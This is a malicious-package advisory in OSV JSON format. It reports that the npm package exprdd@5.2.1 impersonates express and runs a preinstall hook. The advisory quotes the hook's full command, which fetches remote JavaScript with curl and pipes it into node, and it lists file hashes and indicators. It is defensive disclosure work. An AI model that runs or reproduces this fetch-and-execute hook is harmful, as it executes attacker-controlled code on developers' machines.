{"id":"MAL-2026-17241","summary":"Malicious code in exprdd (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4cd27ec488e87cd2e26c940ac161033475731708a3f2ae629c4a138275b520f9)\nexprdd@5.2.1 impersonates the express framework — package name, description, author, contributors, repository, homepage, and keywords are copied verbatim from express. package.json declares a preinstall lifecycle hook: \"curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node\". On `npm install`, this fetches JavaScript from a third-party host (codeberg.org/hellscripter/install-scripts, proxied through web.archive.org) and pipes it directly into node. The fetched code is attacker-controlled, unpinned (mutable `main` branch), and unverified, and executes with the installer's privileges before any package code is required. The typosquat name is the delivery vector for developers mistyping `express`.\n","modified":"2026-09-29T15:00:05.481459366Z","published":"2026-09-29T14:39:12Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-09-29T14:44:37.00132909Z","modified_time":"2026-09-29T14:39:12Z","sha256":"4cd27ec488e87cd2e26c940ac161033475731708a3f2ae629c4a138275b520f9","source":"amazon-inspector","versions":["5.2.1"],"id":"IN-MAL-2026-020625"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/exprdd/v/5.2.1"}],"affected":[{"package":{"name":"exprdd","ecosystem":"npm","purl":"pkg:npm/exprdd"},"versions":["5.2.1"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"218845c213eff56cf6fe35a98d5610c1455fb92adf9688c0f97614561b7199ce","tlsh":"5351da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e52f71b9fbf","path":"package.json"}],"package_integrity":[{"filename":"exprdd-5.2.1.tgz","hashes":{"sha512_sri":"sha512-WvoEyw7cVWFbjaLX3VVoD5djjGWQM8Bohi0tDfXIwVxhYCJOnRAw+XOuglpg2FHqJdgdpNgJ05ZEfK4LsaqXwQ==","sha1":"979d5e66141a1e7ede45f5fdeee09b11991f588c"}}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exprdd/MAL-2026-17241.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}